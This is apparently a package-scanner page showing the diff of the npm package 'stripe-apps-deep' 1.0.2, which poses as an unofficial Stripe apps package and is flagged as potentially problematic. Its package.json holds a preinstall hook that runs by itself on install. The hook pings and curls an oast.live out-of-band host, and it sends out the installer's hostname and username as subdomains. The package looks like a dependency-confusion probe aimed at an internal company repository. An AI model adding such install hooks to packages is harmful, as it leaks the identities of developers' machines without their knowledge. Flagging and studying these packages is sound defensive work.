stripe-apps-deep 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of stripe-apps-deep might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +19 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ import express
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "stripe-apps-deep",
3
+ "version": "1.0.2",
4
+ "description": "package of stripe-apps no official",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall":"/usr/bin/ping -c 1 $(hostname).cgdgmp86dd1id3d1fonggriegx13iqhp9.oast.live && /usr/bin/curl $(whoami).cgdgmp86dd1id3d1fonggriegx13iqhp9.oast.live"
9
+ },
10
+ "repository": {
11
+ "type": "git",
12
+ "url": "https://git.internal.salescomp.com/"
13
+ },
14
+ "keywords": [
15
+ "stripe-apps"
16
+ ],
17
+ "author": "",
18
+ "license": "ISC"
19
+ }